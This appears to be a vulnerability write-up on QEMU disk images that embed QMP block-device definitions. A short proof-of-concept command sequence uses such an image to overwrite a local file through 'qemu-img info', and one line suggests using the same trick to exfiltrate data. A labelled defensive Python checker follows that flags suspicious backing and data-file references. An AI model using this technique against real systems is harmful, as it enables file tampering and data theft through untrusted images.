There is an obscure feature to embed QMP definitions for block devices into disk images. This works for backing and data files in the QCOW2 format as well as for extents in VMDK. So here is a proof of concept that overwrites a local file:
# prepare two files with random content
truncate -s 1M file-1.raw && dd if=/dev/random of=file-1.raw bs=64 count=1 conv=notrunc
truncate -s 1M file-2.raw && dd if=/dev/random of=file-2.raw bs=64 count=1 conv=notrunc
# serve the second file via NBD
qemu-nbd -p 1234 -f raw -x "data" -v -t -T 'nbd*' file-2.raw
# prepare the disk image
./qmp.sh
# ... and overwrite the first 112 bytes in file-1
qemu-img info disk.qcow2
Swap child1 and child2 to exfiltrate data or use the snapshot-access to deliver data to firewalled systems.
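
A pre-flight check for tooling that receives untrusted images: read the backing-file and external-data-file strings straight from the QCOW2 header, without opening the image in QEMU, and flag any that are `json:` definitions or protocol URLs. This is an added example, not code from the original report; the function names, the flagging policy and the sample header are assumptions made for illustration, and VMDK extents are not covered.

```python
import struct

QCOW2_MAGIC = b"QFI\xfb"
EXT_END = 0x00000000
EXT_DATA_FILE = 0x44415441  # header extension: external data file name


def qcow2_external_refs(image: bytes) -> dict:
    """Return the backing-file and data-file strings stored in a QCOW2 header."""
    if image[:4] != QCOW2_MAGIC:
        raise ValueError("not a QCOW2 image")
    version, backing_off, backing_len = struct.unpack_from(">IQI", image, 4)
    refs = {}
    if backing_off and backing_len:
        raw = image[backing_off:backing_off + backing_len]
        refs["backing"] = raw.decode("utf-8", "replace")
    # Extensions follow the fixed header: 72 bytes in v2, header_length in v3.
    pos = 72 if version == 2 else struct.unpack_from(">I", image, 100)[0]
    while pos + 8 <= len(image):
        ext_type, ext_len = struct.unpack_from(">II", image, pos)
        if ext_type == EXT_END:
            break
        if ext_type == EXT_DATA_FILE:
            raw = image[pos + 8:pos + 8 + ext_len]
            refs["data"] = raw.decode("utf-8", "replace")
        pos += 8 + ((ext_len + 7) & ~7)  # extension data is padded to 8 bytes
    return refs


def is_suspicious(ref: str) -> bool:
    """Assumed policy: flag json: definitions and anything with a protocol prefix."""
    return ref.startswith("json:") or ":" in ref.split("/", 1)[0]


def build_sample(backing: str = "", data: str = "") -> bytes:
    """Constructed minimal QCOW2 v3 header (no clusters) to exercise the parser."""
    hdr, ext = bytearray(512), b""
    if data:
        d = data.encode()
        ext += struct.pack(">II", EXT_DATA_FILE, len(d)) + d + b"\0" * (-len(d) % 8)
    ext += struct.pack(">II", EXT_END, 0)
    b = backing.encode()
    b_off = 104 + len(ext) if b else 0
    struct.pack_into(">4sIQI", hdr, 0, QCOW2_MAGIC, 3, b_off, len(b))
    struct.pack_into(">I", hdr, 100, 104)  # header_length
    hdr[104:104 + len(ext)] = ext
    hdr[b_off:b_off + len(b)] = b
    return bytes(hdr)
```

Only the first few kilobytes of an image need to be read for this check, so it can run before any QEMU tool touches the file.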